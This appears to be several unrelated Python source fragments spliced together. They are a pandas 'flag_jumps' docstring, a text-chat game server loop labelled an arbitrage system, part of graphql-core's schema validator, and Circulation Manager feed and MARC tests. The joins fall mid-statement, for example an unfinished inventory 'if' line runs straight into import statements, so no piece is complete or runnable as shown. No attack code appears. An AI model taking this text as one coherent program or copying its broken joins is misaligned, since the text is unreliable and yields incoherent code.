scale="absolute",
direction="any",
threshold=2,
)
)
Detailed chaining examples:
.. code-block:: python
# Applies specified criteria across all columns of the dataframe
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale="absolute",
direction="any",
threshold=2
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute", col2="percentage"),
direction=dict(col1="increasing", col2="any"),
threshold=dict(col1=1, col2=0.5),
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for each column in the dataframe
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute"),
direction=dict(col2="increasing"),
)
)
# Applies specific criteria to certain dataframe columns
# Applies default criteria to columns not specifically listed
# Appends a flag column for only those columns found in
# specified criteria
df = (
pd.DataFrame(...)
.flag_jumps(
scale=dict(col1="absolute"),
threshold=dict(col2=1),
strict=True,
)
)
:param df: Dataframe which needs to be flagged for changes between
consecutive rows above a certain threshold.
:param scale: Type of scaling approach to use.
Acceptable arguments are:
1. absolute (consider the difference between rows).
2. percentage (consider the percentage change between rows).
Defaults to percentage.
:param direction: Type of method used to handle the sign change when
comparing consecutive rows.
Acceptable arguments are:
1. increasing (only consider rows that are increasing in value).
2. decreasing (only consider rows that are decreasing in value).
3. any (consider rows that are either increasing or decreasing;
sign is ignored).
Defaults to any.
:param threshold: The value to check if consecutive row comparisons
exceed. Always uses a greater than comparison. Must be >= 0.0.
"""
Open Test Arbitrage System. USE AT YOUR OWN RISK!
MULTIPLE EXCHANGE ACCEPTANCE
ALLOWS 'USERS' TO CHOOSE THEIR OWN STRATEGY AS WELL AS TRADING COINS
PROVIDES DETAILED INFORMATION ABOUT EXCHANGES & PLATFORMS
ALLOWS USERS TO CONNECT IN A FRIENDLY ENVIRONMENT
Author: ~Skrypt~
"""
import sys
import os
import time
import shlex
import random
import sha3
import pickle
import hashlib
#from web3 import Web3
#from web3.providers.rpc import HTTPProvider
#from ecdsa import SigningKey, SECP256k1
#web3 = Web3(HTTPProvider('https://mainnet.infura.io/M4QNeQhVp2x0Lm0OxNvW'))
#true = True
#false = False
#from resources import *
from resources.TheCoreData.RawData import *
from resources.PersonaData.PersonaRaw import *
from resources.TheCoreData.CoreResponse import *
#from resources.TheCoreData.CoreSyntax import CoreSyntaxSets
from resources.worlditems import worldItems
from resources.worldnotice import worldNotice
from resources.worldLists import worldLists
from resources.useroptions import userOptions
from resources.worldBoolean import worldBoolean
# import the Environment server class
from resources.server import C0reServer
from resources.TheCoreData.CoreItems import *
from resources.TheCoreData.C0reRoomSystem.C0reRooms import TheC0reRooms
from resources.TheCoreData.C0reUserSystem.UserObject import *
global C0RESUBPATH
global C0RESYNTAXPATH
C0RESUBPATH = './resources/TheCoreData/C0reSyntaxSystem/C0reSubSyntax.cmf'
C0RESYNTAXPATH = './resources/TheCoreData/C0reSyntaxSystem/C0reSyntax.cmf'
users = {}
Total_Users = 0
# starts C0re Server
C0re = C0reServer(input('|[USERNAME]>>: '),hashlib.sha256(input('|[PASSWORD]>>: ').encode()).hexdigest())
INTERVAL = 0.2
C0reSub = pickle.load(open(C0RESUBPATH,'rb'))
C0reSyntax = pickle.load(open(C0RESYNTAXPATH,'rb'))
print('Starting C0re Server And Hosting Platform Please Wait A Moment')
while True:
time.sleep(0.2)
# 'update' must be called in the loop to keep the environment running and give
# us up-to-date information
C0re.update()
for id in C0re.get_new_users():
# User IS DEFINED HERE FROM - [Resources.PersonaData.UserObject.py]
users[id] = C0reGuest()
Total_Users += 1
C0re.send_message(id, Eresp["E_Notice_Welcome"].title())
for id in C0re.get_disconnected_users():
if id not in users: continue
for pid,pl in users.items():
C0re.send_message(pid, Eresp["E_Notice_Quit"].format(users[id].Name))
del(users[id])
for id,gak,params in C0re.get_commands():
if id not in users: continue
if users[id].Started == False:
users[id].Name = 'GuestWallet' + hex(Total_Users)
users[id].Started = True
usershere = []
for pid,pl in users.items():
if users[pid].Room == users[id].Room:
usershere.append(users[pid].Name)
C0re.send_message(pid, Eresp["E_Notice_Public_Symbol"].title())
C0re.send_message(pid, Eresp["E_Notice_Enter_Message"].format(users[id].Name))
rm = rooms[users[id].Room]
C0re.send_message(id, Eresp["E_Notice_Welcome_0"].format(users[id].Name))
C0re.send_message(id, Eresp['E_Notice_Welcome_1'].format())
C0re.send_message(id, Eresp['E_Notice_Have_Entered'].format(users[id].Room))
C0re.send_message(id, Eresp['E_Notice_Current_Room_Id'].format(users[id].RoomID))
C0re.send_message(id, Eresp['E_Notice_Open_Room_Format'].format(rm["description"]))
C0re.send_message(id, Eresp['E_Notice_Also_Here']+"%s" % ", ".join(usershere).title())
C0re.send_message(id, Eresp['E_Notice_Visible_Exits']+"%s" % ", ".join(rm["exits"]).title())
#Conditions To The Alive Player Below
# Refer to Ess.py for gak list referrences. ~Skrypt
elif gak.lower() in C0reSub:
par = params
par_split = par.split(' ')
Command = C0reSub[gak.lower()]
if 'global' in C0reSyntax[Command]['Rooms'] or users[id].Room_id in C0reSyntax[Command]['Rooms']:
if users[id].User_Level in C0reSyntax[Command]['Users'] or 'global' in C0reSyntax[Command]['Users']:
# Assert Command Match Here
if users[id].C0reTime == 0:
########### Start Of 'Say' Syntax #################################
if Command == 'say':
if TheC0reRooms[users[id].Room].Private == False and TheC0reRooms[users[id].Room].Whisper_Only == False:
if users[id].Special_Speech == False:
C0re.send_message(id, '{0}, \'{1}\''.format(users[id].Speech,params),users[id].Name) # Alert User
elif users[id].Special_Speech == True:
C0re.send_message(id, '{0} and Say, \'{1}\''.format(users[id].Speech,params),users[id].Name) # Alert User
# go through every user in the game
for pid,pl in users.items():
# if they're in the same room as the user
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
if users[id].Special_Speech == False:
C0re.send_message(pid, '{0}s, \'{1}\''.format(users[id].Speech, params),users[id].Name) # Tell Everyone In Room Except User
elif users[id].Special_Speech == True:
C0re.send_message(pid, '{0} and Says, \'{1}\''.format(users[id].Speech,params),users[id].Name)
elif TheC0reRooms[users[id].Room].Private == True or TheC0reRooms[users[id].Room].Whisper_Only == True:
if TheC0reRooms[users[id].Room].Private == True:
C0re.send_message(id, 'I\'m Sorry [{}] This Is A Private Area No Speaking Or Whispering Allowed.'.format(users[id].Name),'Vivian')
for pid,pl in users.items():
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
C0re.send_message(pid, 'Tries But Fails To Speak.',users[id].Name)
elif TheC0reRooms[users[id].Room].Whisper_Only == True:
C0re.send_message(id, 'I\'m Sorry [{}], This Is A Whisper Only Area.'.format(users[id].Name),'Vivian')
for pid,pl in users.items():
if users[pid].Room == users[id].Room and users[pid].Name != users[id].Name:
C0re.send_message(pid,'Fails To Whisper.',users[id].Name)
######## End Of Say Syntax ###################################################
elif users[id].C0reTime > 0:
users[id].C0reTime += C0reTimeMap[gak.lower()] # Adds Additional C0re-Time To Prevent Server Spam
C0re.send_message(id,'...Please Wait ({}) C0re-Time...'.format(users[id].C0reTime),'Vivian')
elif users[id].User_Level not in C0reSyntax[Command]['Users'] and 'global' not in C0reSyntax[Command]['Users']:
# Assert Command Level Failure
C0re.send_message(id, '[{}] Syntax Is Not A [{}] Privilege At This Time.'.format(Command,users[id].User_Level),'Vivian')
elif 'global' not in C0reSyntax[Command]['Rooms'] or users[id].Room_id not in C0reSyntax[Command]['Rooms']:
# Assert Command Room Failure
C0re.send_message(id, '[{}] Syntax Is Not Available Within Room [{}] At This Time.'.format(Command,users[id].Room),'Vivian')
else:
C0re.send_message(id, '[{}] Is An Unknown Command. Please \'Submit\' A Support Ticket If You Feel This Is A Mistake.'.format(gak))
# 'get' command (Object Initiated) Inventory active needs room objects initiated and sub-surface objects (table items etc.)
elif gak.lower() in Ess["get"]["sets"]:
pa = params.lower()
pa_sub = pa.split(' ')
user_has_item = False
taken = False
try:
if pa_sub[0] == 'my' and pa_sub[1] != '':
for i in users[id]["inventory"]:
if i.Name == pa_sub[1].title():
user_has_item = True
taken = False
elif i.Name == pa_sub[1].title()+' '+pa_sub[2].title():
user_has_item = True
taken = False
if user_has_item == True and taken == False:
if users[id]["left hand"] != [] and users[id]["right hand"] != []:
C0re.send_message(id, "Your Hands Are Full. Maybe STOW Something And Try Again?")
elif users[id]["right hand"] == []:
users[id]["inventory"].remove(i)
users[id]["right hand"].append(i)
taken = True
C0re.send_message(id, "You Get Your {0} From Your Inventory With Your Right Hand.".format(i.Name))
elif users[id]["left hand"] == []:
users[id]["inventory"].remove(i)
users[id]["left hand"].append(i)
taken = True
C0re.send_message(id, "You Get Your {0} From Your Inventory With Your Left Hand.".format(i.Name))
else:
C0re.send_message(id, "Sorry {0}, You Do Not Have {1}.".format(users[id]["name"].title(), i.Name))
else:
C0re.send_message(id, 'What Are You Trying To Get?')
except Exception as Get_What:
C0re.send_message(id, 'What Are You Trying To Get?')
#elif paramTitle in wi: #needs work on this block (items need to be added to WI)
#Evm.send_message(id, "Sorry {0}, You Cannot Get This Period.".format(users[id]["name"].title()))
# 'stow' command (Object Initiated)
elif gak in Ess["stow"]["sets"]:
pa = params.lower()
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Have Nothing To Stow In Your Hands.")
elif users[id]["right hand"] != [] and pa == "right":
item_to_stow = users[id]["right hand"][0]
users[id]["right hand"].remove(item_to_stow)
users[id]["inventory"].append(item_to_stow)
C0re.send_message(id, "You Put Your {} From Your Right Hand In Your Inventory.".format(item_to_stow.Name))
elif users[id]["left hand"] != [] and pa == "left":
item_to_stow = users[id]["left hand"][0]
users[id]["left hand"].remove(item_to_stow)
users[id]["inventory"].append(item_to_stow)
C0re.send_message(id, "You Put Your {} From Your Left Hand In Your Inventory.".format(item_to_stow.Name))
elif users[id]["right hand"] == [] and pa == "right":
C0re.send_message(id, "You Have Nothing In Your Right Hand To Put In Your Inventory.")
elif users[id]["left hand"] == [] and pa == "left":
C0re.send_message(id, "You Have Nothing In Your Left Hand To Put In Your Inventory.")
elif params == "":
C0re.send_message(id, "Usage Is STOW RIGHT/LEFT.".format())
# 'swap' command (Object Initiated)
elif gak in Ess["swap"]["sets"]:
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Have Nothing To Swap In Your Hands.")
elif users[id]["right hand"] != [] and users[id]["left hand"] == []:
item_to_swap = users[id]["right hand"][0]
users[id]["right hand"].remove(item_to_swap)
users[id]["left hand"].append(item_to_swap)
C0re.send_message(id, "You Swap Your {} From Your Right Hand To Your Left Hand.".format(item_to_swap.Name))
elif users[id]["right hand"] == [] and users[id]["left hand"] != []:
item_to_swap = users[id]["left hand"][0]
users[id]["left hand"].remove(item_to_swap)
users[id]["right hand"].append(item_to_swap)
C0re.send_message(id, "You Swap Your {} From Your Left Hand To Your Right Hand.".format(item_to_swap.Name))
elif users[id]["right hand"] != [] and users[id]["left hand"] != []:
r = users[id].Body.RightHand[0]
l = users[id].Body.LeftHand[0]
users[id].Body.RightHand.remove(r)
users[id].Body.RightHand.append(l)
users[id].Body.LeftHand.remove(l)
users[id].Body.LeftHand.append(r)
C0re.send_message(id, 'You carefully swap {0} and {1} between your hands.'.format(users[id].Body.LeftHand,users[id].Body.RightHand))
# 'glance' command (Object Initiated)
elif gak.lower() in Ess["glance"]["sets"]:
if users[id]["right hand"] == [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Glance Down At Your Empty Hands.")
elif users[id]["right hand"] != [] and users[id]["left hand"] == []:
C0re.send_message(id, "You Glance Down And See Nothing In Your Left Hand And {} In Your Right Hand.".format(users[id]["right hand"][0].Name))
elif users[id]["right hand"] == [] and users[id]["left hand"] != []:
C0re.send_message(id, "You Glance Down And See Nothing In Your Right Hand And {} In Your Left Hand.".format(users[id]["left hand"][0].Name))
elif users[id]["right hand"] != [] and users[id]["left hand"] != []:
C0re.send_message(id, "You Glance Down And See {0} In Your Right Hand And {1} In Your Left Hand.".format(users[id]["right hand"][0].Name, users[id]["left hand"][0].Name))
# '*say' command
elif gak.lower() in Ess["say change"]["sets"]:
pa = params.lower()
poa = po["user_actions"]
empty = ""
if pa == empty:
C0re.send_message(id, "Please Use *say "+"STYLE ".upper()+"For More Information On "+"STYLE".upper()+" use /*say".title())
if pa not in poa["say_options"] and pa != empty:
if pa not in poa["plural_options"]:
C0re.send_message(id, "that is not an option")
if pa in poa["say_options"]:
C0re.send_message(id, "thank you for choosing ".title()+pa.title())
C0re.send_message(id, "please remember to use *say in the future to alter your options".title())
users[id]["special speech"] = False
users[id]["speech"] = pa
elif pa in poa["plural_options"]:
C0re.send_message(id, "thank you for choosing ".title()+pa.title())
C0re.send_message(id, "please remember to use *say in the future to alter your options".title())
users[id]["special speech"] = True
users[id]["speech"] = pa
# 'inv' command (Object Initiated)
elif gak.lower() in Ess["inventory"]["sets"]:
name = users[id]["name"].title()
# send a message to user with the inventory
if users[id]["inventory"]
from operator import attrgetter, itemgetter
from typing import (
Any,
Collection,
Dict,
List,
Optional,
Set,
Tuple,
Union,
cast,
)
from ..error import GraphQLError, located_error
from ..pyutils import inspect
from ..language import (
DirectiveNode,
InputValueDefinitionNode,
InterfaceTypeDefinitionNode,
InterfaceTypeExtensionNode,
NamedTypeNode,
Node,
ObjectTypeDefinitionNode,
ObjectTypeExtensionNode,
OperationType,
SchemaDefinitionNode,
SchemaExtensionNode,
UnionTypeDefinitionNode,
UnionTypeExtensionNode,
)
from .definition import (
GraphQLEnumType,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInterfaceType,
GraphQLObjectType,
GraphQLUnionType,
is_enum_type,
is_input_object_type,
is_input_type,
is_interface_type,
is_named_type,
is_non_null_type,
is_object_type,
is_output_type,
is_union_type,
is_required_argument,
is_required_input_field,
)
from ..utilities.assert_valid_name import is_valid_name_error
from ..utilities.type_comparators import is_equal_type, is_type_sub_type_of
from .directives import is_directive, GraphQLDeprecatedDirective
from .introspection import is_introspection_type
from .schema import GraphQLSchema, assert_schema
__all__ = ["validate_schema", "assert_valid_schema"]
def validate_schema(schema: GraphQLSchema) -> List[GraphQLError]:
"""Validate a GraphQL schema.
Implements the "Type Validation" sub-sections of the specification's "Type System"
section.
Validation runs synchronously, returning a list of encountered errors, or an empty
list if no errors were encountered and the Schema is valid.
"""
# First check to ensure the provided value is in fact a GraphQLSchema.
assert_schema(schema)
# If this Schema has already been validated, return the previous results.
# noinspection PyProtectedMember
errors = schema._validation_errors
if errors is None:
# Validate the schema, producing a list of errors.
context = SchemaValidationContext(schema)
context.validate_root_types()
context.validate_directives()
context.validate_types()
# Persist the results of validation before returning to ensure validation does
# not run multiple times for this schema.
errors = context.errors
schema._validation_errors = errors
return errors
def assert_valid_schema(schema: GraphQLSchema) -> None:
"""Utility function which asserts a schema is valid.
Throws a TypeError if the schema is invalid.
"""
errors = validate_schema(schema)
if errors:
raise TypeError("\n\n".join(error.message for error in errors))
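# A minimal usage sketch (graphql-core public API; the example schema itself
# is hypothetical):
#
#   from graphql import (
#       GraphQLField, GraphQLObjectType, GraphQLSchema, GraphQLString)
#
#   query = GraphQLObjectType("Query", {"hello": GraphQLField(GraphQLString)})
#   assert validate_schema(GraphQLSchema(query=query)) == []
#
#   # A schema without a query root is invalid:
#   errors = validate_schema(GraphQLSchema())
#   assert errors[0].message == "Query root type must be provided."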
class SchemaValidationContext:
"""Utility class providing a context for schema validation."""
errors: List[GraphQLError]
schema: GraphQLSchema
def __init__(self, schema: GraphQLSchema):
self.errors = []
self.schema = schema
def report_error(
self,
message: str,
nodes: Union[Optional[Node], Collection[Optional[Node]]] = None,
) -> None:
if nodes and not isinstance(nodes, Node):
nodes = [node for node in nodes if node]
nodes = cast(Optional[Collection[Node]], nodes)
self.add_error(GraphQLError(message, nodes))
def add_error(self, error: GraphQLError) -> None:
self.errors.append(error)
def validate_root_types(self) -> None:
schema = self.schema
query_type = schema.query_type
if not query_type:
self.report_error("Query root type must be provided.", schema.ast_node)
elif not is_object_type(query_type):
self.report_error(
f"Query root type must be Object type, it cannot be {query_type}.",
get_operation_type_node(schema, OperationType.QUERY)
or query_type.ast_node,
)
mutation_type = schema.mutation_type
if mutation_type and not is_object_type(mutation_type):
self.report_error(
"Mutation root type must be Object type if provided,"
f" it cannot be {mutation_type}.",
get_operation_type_node(schema, OperationType.MUTATION)
or mutation_type.ast_node,
)
subscription_type = schema.subscription_type
if subscription_type and not is_object_type(subscription_type):
self.report_error(
"Subscription root type must be Object type if provided,"
f" it cannot be {subscription_type}.",
get_operation_type_node(schema, OperationType.SUBSCRIPTION)
or subscription_type.ast_node,
)
def validate_directives(self) -> None:
directives = self.schema.directives
for directive in directives:
# Ensure all directives are in fact GraphQL directives.
if not is_directive(directive):
self.report_error(
f"Expected directive but got: {inspect(directive)}.",
getattr(directive, "ast_node", None),
)
continue
# Ensure they are named correctly.
self.validate_name(directive)
# Ensure the arguments are valid.
for arg_name, arg in directive.args.items():
# Ensure they are named correctly.
self.validate_name(arg, arg_name)
# Ensure the type is an input type.
if not is_input_type(arg.type):
self.report_error(
f"The type of @{directive.name}({arg_name}:)"
f" must be Input Type but got: {inspect(arg.type)}.",
arg.ast_node,
)
if is_required_argument(arg) and arg.deprecation_reason is not None:
self.report_error(
f"Required argument @{directive.name}({arg_name}:)"
" cannot be deprecated.",
[
get_deprecated_directive_node(arg.ast_node),
arg.ast_node and arg.ast_node.type,
],
)
def validate_name(self, node: Any, name: Optional[str] = None) -> None:
# Ensure names are valid, however introspection types opt out.
try:
if not name:
name = node.name
name = cast(str, name)
ast_node = node.ast_node
except AttributeError: # pragma: no cover
pass
else:
error = is_valid_name_error(name)
if error:
self.add_error(located_error(error, ast_node))
def validate_types(self) -> None:
validate_input_object_circular_refs = InputObjectCircularRefsValidator(self)
for type_ in self.schema.type_map.values():
# Ensure all provided types are in fact GraphQL type.
if not is_named_type(type_):
self.report_error(
f"Expected GraphQL named type but got: {inspect(type_)}.",
type_.ast_node if is_named_type(type_) else None,
)
continue
# Ensure it is named correctly (excluding introspection types).
if not is_introspection_type(type_):
self.validate_name(type_)
if is_object_type(type_):
type_ = cast(GraphQLObjectType, type_)
# Ensure fields are valid
self.validate_fields(type_)
# Ensure objects implement the interfaces they claim to.
self.validate_interfaces(type_)
elif is_interface_type(type_):
type_ = cast(GraphQLInterfaceType, type_)
# Ensure fields are valid.
self.validate_fields(type_)
# Ensure interfaces implement the interfaces they claim to.
self.validate_interfaces(type_)
elif is_union_type(type_):
type_ = cast(GraphQLUnionType, type_)
# Ensure Unions include valid member types.
self.validate_union_members(type_)
elif is_enum_type(type_):
type_ = cast(GraphQLEnumType, type_)
# Ensure Enums have valid values.
self.validate_enum_values(type_)
elif is_input_object_type(type_):
type_ = cast(GraphQLInputObjectType, type_)
# Ensure Input Object fields are valid.
self.validate_input_fields(type_)
# Ensure Input Objects do not contain non-nullable circular references
validate_input_object_circular_refs(type_)
def validate_fields(
self, type_: Union[GraphQLObjectType, GraphQLInterfaceType]
) -> None:
fields = type_.fields
# Objects and Interfaces both must define one or more fields.
if not fields:
self.report_error(
f"Type {type_.name} must define one or more fields.",
[type_.ast_node, *(type_.extension_ast_nodes or ())],
)
for field_name, field in fields.items():
# Ensure they are named correctly.
self.validate_name(field, field_name)
# Ensure the type is an output type
if not is_output_type(field.type):
self.report_error(
f"The type of {type_.name}.{field_name}"
f" must be Output Type but got: {inspect(field.type)}.",
field.ast_node and field.ast_node.type,
)
# Ensure the arguments are valid.
for arg_name, arg in field.args.items():
# Ensure they are named correctly.
self.validate_name(arg, arg_name)
# Ensure the type is an input type.
if not is_input_type(arg.type):
self.report_error(
f"The type of {type_.name}.{field_name}({arg_name}:)"
f" must be Input Type but got: {inspect(arg.type)}.",
arg.ast_node and arg.ast_node.type,
)
if is_required_argument(arg) and arg.deprecation_reason is not None:
self.report_error(
f"Required argument {type_.name}.{field_name}({arg_name}:)"
" cannot be deprecated.",
[
get_deprecated_directive_node(arg.ast_node),
arg.ast_node and arg.ast_node.type,
],
)
def validate_interfaces(
self, type_: Union[GraphQLObjectType, GraphQLInterfaceType]
) -> None:
iface_type_names: Set[str] = set()
for iface in type_.interfaces:
if not is_interface_type(iface):
self.report_error(
f"Type {type_.name} must only implement Interface"
f" types, it cannot implement {inspect(iface)}.",
get_all_implements_interface_nodes(type_, iface),
)
continue
if type_ is iface:
self.report_error(
f"Type {type_.name} cannot implement itself"
" because it would create a circular reference.",
get_all_implements_interface_nodes(type_, iface),
)
if iface.name in iface_type_names:
self.report_error(
f"Type {type_.name} can only implement {iface.name} once.",
get_all_implements_interface_nodes(type_, iface),
)
continue
iface_type_names.add(iface.name)
self.validate_type_implements_ancestors(type_, iface)
self.validate_type_implements_interface(type_, iface)
def validate_type_implements_interface(
self,
type_: Union[GraphQLObjectType, GraphQLInterfaceType],
iface: GraphQLInterfaceType,
) -> None:
type_fields, iface_fields = type_.fields, iface.fields
# Assert each interface field is implemented.
for field_name, iface_field in iface_fields.items():
type_field = type_fields.get(field_name)
# Assert interface field exists on object.
if not type_field:
self.report_error(
f"Interface field {iface.name}.{field_name}"
f" expected but {type_.name} does not provide it.",
[
iface_field.ast_node,
type_.ast_node,
*(type_.extension_ast_nodes or ()),
],
)
continue
# Assert interface field type is satisfied by type field type, by being
# a valid subtype (covariant).
if not is_type_sub_type_of(self.schema, type_field.type, iface_field.type):
self.report_error(
f"Interface field {iface.name}.{field_name}"
f" expects type {iface_field.type}"
f" but {type_.name}.{field_name}"
f" is type {type_field.type}.",
[
iface_field.ast_node and iface_field.ast_node.type,
type_field.ast_node and type_field.ast_node.type,
],
)
# Assert each interface field arg is implemented.
for arg_name, iface_arg in iface_field.args.items():
type_arg = type_field.args.get(arg_name)
# Assert interface field arg exists on object field.
if not type_arg:
self.report_error(
"Interface field argument"
f" {iface.name}.{field_name}({arg_name}:)"
f" expected but {type_.name}.{field_name}"
" does not provide it.",
[iface_arg.ast_node, type_field.ast_node],
)
continue
# Assert interface field arg type matches object field arg type
# (invariant).
if not is_equal_type(iface_arg.type, type_arg.type):
self.report_error(
"Interface field argument"
f" {iface.name}.{field_name}({arg_name}:)"
f" expects type {iface_arg.type}"
f" but {type_.name}.{field_name}({arg_name}:)"
f" is type {type_arg.type}.",
[
iface_arg.ast_node and iface_arg.ast_node.type,
type_arg.ast_node and type_arg.ast_node.type,
],
)
# Assert additional arguments must not be required.
for arg_name, type_arg in type_field.args.items():
iface_arg = iface_field.args.get(arg_name)
if not iface_arg and is_required_argument(type_arg):
self.report_error(
f"Object field {type_.name}.{field_name} includes"
f" required argument {arg_name} that is missing from"
f" the Interface field {iface.name}.{field_name}.",
[type_arg.ast_node, iface_field.ast_node],
)
def validate_type_implements_ancestors(
self,
type_: Union[GraphQLObjectType, GraphQLInterfaceType],
iface: GraphQLInterfaceType,
) -> None:
type_interfaces, iface_interfaces = type_.interfaces, iface.interfaces
for transitive in iface_interfaces:
if transitive not in type_interfaces:
self.report_error(
f"Type {type_.name} cannot implement {iface.name}"
" because it would create a circular reference."
if transitive is type_
else f"Type {type_.name} must implement {transitive.name}"
f" because it is implemented by {iface.name}.",
get_all_implements_interface_nodes(iface, transitive)
+ get_all_implements_interface_nodes(type_, iface),
)
def validate_union_members(self, union: GraphQLUnionType) -> None:
member_types = union.types
if not member_types:
self.report_error(
f"Union type {union.name} must define one or more member types.",
[union.ast_node, *(union.extension_ast_nodes or ())],
)
included_type_names: Set[str] = set()
for member_type in member_types:
if is_object_type(member_type):
if member_type.name in included_type_names:
self.report_error(
f"Union type {union.name} can only | |
# proper Response object is the job of the real
# _crawlable_feed.
eq_("An OPDS feed.", response)
# Verify that _crawlable_feed was called with the right arguments.
kwargs = self._crawlable_feed_called_with
eq_(expect_url, kwargs.pop('url'))
eq_(customlist.name, kwargs.pop('title'))
eq_(None, kwargs.pop('annotator'))
eq_(AcquisitionFeed, kwargs.pop('feed_class'))
# A CrawlableCustomListBasedLane was created to fetch only
# the works in the custom list.
lane = kwargs.pop('worklist')
assert isinstance(lane, CrawlableCustomListBasedLane)
eq_([customlist.id], lane.customlist_ids)
eq_({}, kwargs)
def test__crawlable_feed(self):
# Test the helper method called by all other feed methods.
self.page_called_with = None
class MockFeed(object):
@classmethod
def page(cls, **kwargs):
self.page_called_with = kwargs
return Response("An OPDS feed")
work = self._work(with_open_access_download=True)
class MockLane(DynamicLane):
def works(self, _db, facets, pagination, *args, **kwargs):
# We need to call page_loaded() (normally called by
# the search engine after obtaining real search
# results), because OPDSFeed.page will call it if it
# wasn't already called.
#
# It's not necessary for this test to call it with a
# realistic value, but we might as well.
results = [
MockSearchResult(
work.sort_title, work.sort_author, {}, work.id
)
]
pagination.page_loaded(results)
return [work]
mock_lane = MockLane()
mock_lane.initialize(None)
in_kwargs = dict(
title="Lane title",
url="Lane URL",
worklist=mock_lane,
feed_class=MockFeed
)
# Bad pagination data -> problem detail
with self.app.test_request_context("/?size=a"):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
assert isinstance(response, ProblemDetail)
eq_(INVALID_INPUT.uri, response.uri)
eq_(None, self.page_called_with)
# Bad search engine -> problem detail
self.assert_bad_search_index_gives_problem_detail(
lambda: self.manager.opds_feeds._crawlable_feed(**in_kwargs)
)
# Good pagination data -> feed_class.page() is called.
sort_key = ["sort", "pagination", "key"]
with self.app.test_request_context(
"/?size=23&key=%s" % json.dumps(sort_key)
):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
# The result of page() was served as an OPDS feed.
eq_(200, response.status_code)
eq_("An OPDS feed", response.data)
# Verify the arguments passed in to page().
out_kwargs = self.page_called_with
eq_(self._db, out_kwargs.pop('_db'))
eq_(self.manager.opds_feeds.search_engine,
out_kwargs.pop('search_engine'))
eq_(in_kwargs['worklist'], out_kwargs.pop('worklist'))
eq_(in_kwargs['title'], out_kwargs.pop('title'))
eq_(in_kwargs['url'], out_kwargs.pop('url'))
# Since no annotator was provided and the request did not
# happen in a library context, a generic
# CirculationManagerAnnotator was created.
annotator = out_kwargs.pop('annotator')
assert isinstance(annotator, CirculationManagerAnnotator)
eq_(mock_lane, annotator.lane)
# There's only one way to configure CrawlableFacets, so it's
# sufficient to check that our faceting object is in fact a
# CrawlableFacets.
facets = out_kwargs.pop('facets')
assert isinstance(facets, CrawlableFacets)
# Verify that pagination was picked up from the request.
pagination = out_kwargs.pop('pagination')
assert isinstance(pagination, SortKeyPagination)
eq_(sort_key, pagination.last_item_on_previous_page)
eq_(23, pagination.size)
# We're done looking at the arguments.
eq_({}, out_kwargs)
# If a custom Annotator is passed in to _crawlable_feed, it's
# propagated to the page() call.
mock_annotator = object()
with self.app.test_request_context("/"):
response = self.manager.opds_feeds._crawlable_feed(
annotator=mock_annotator, **in_kwargs
)
eq_(mock_annotator, self.page_called_with['annotator'])
# Finally, remove the mock feed class and verify that a real OPDS
# feed is generated from the result of MockLane.works()
del in_kwargs['feed_class']
with self.request_context_with_library("/"):
response = self.manager.opds_feeds._crawlable_feed(**in_kwargs)
feed = feedparser.parse(response.data)
# There is one entry with the expected title.
[entry] = feed['entries']
eq_(entry['title'], work.title)
class TestMARCRecordController(CirculationControllerTest):
def test_download_page_with_exporter_and_files(self):
now = datetime.datetime.now()
yesterday = now - datetime.timedelta(days=1)
library = self._default_library
lane = self._lane(display_name="Test Lane")
exporter = self._external_integration(
ExternalIntegration.MARC_EXPORT, ExternalIntegration.CATALOG_GOAL,
libraries=[self._default_library])
rep1, ignore = create(
self._db, Representation,
url="http://mirror1", mirror_url="http://mirror1",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache1, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep1, end_time=now)
rep2, ignore = create(
self._db, Representation,
url="http://mirror2", mirror_url="http://mirror2",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=yesterday)
cache2, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=lane,
representation=rep2, end_time=yesterday)
rep3, ignore = create(
self._db, Representation,
url="http://mirror3", mirror_url="http://mirror3",
media_type=Representation.MARC_MEDIA_TYPE,
mirrored_at=now)
cache3, ignore = create(
self._db, CachedMARCFile,
library=self._default_library, lane=None,
representation=rep3, end_time=now,
start_time=yesterday)
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "<h3>All Books</h3>" in html
assert '<a href="http://mirror1">Full file - last updated %s</a>' % now.strftime("%B %-d, %Y") in html
assert "<h4>Update-only files</h4>" in html
assert '<a href="http://mirror3">Updates from %s to %s</a>' % (yesterday.strftime("%B %-d, %Y"), now.strftime("%B %-d, %Y")) in html
assert '<h3>Test Lane</h3>' in html
assert '<a href="http://mirror2">Full file - last updated %s</a>' % yesterday.strftime("%B %-d, %Y") in html
def test_download_page_with_exporter_but_no_files(self):
now = datetime.datetime.now()
yesterday = now - datetime.timedelta(days=1)
library = self._default_library
exporter = self._external_integration(
ExternalIntegration.MARC_EXPORT, ExternalIntegration.CATALOG_GOAL,
libraries=[self._default_library])
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert "MARC files aren't ready" in html
def test_download_page_no_exporter(self):
library = self._default_library
with self.request_context_with_library("/"):
response = self.manager.marc_records.download_page()
eq_(200, response.status_code)
html = response.data
assert ("Download MARC files for %s" % library.name) in html
assert ("No MARC exporter is currently configured") in html
# If the exporter was deleted after some MARC files were cached,
# they will still be available to download.
now = datetime.datetime.now()
rep, ignore = create(
self._db, Representation,
url="http://mirror1", mirror_url="http://mirror1",
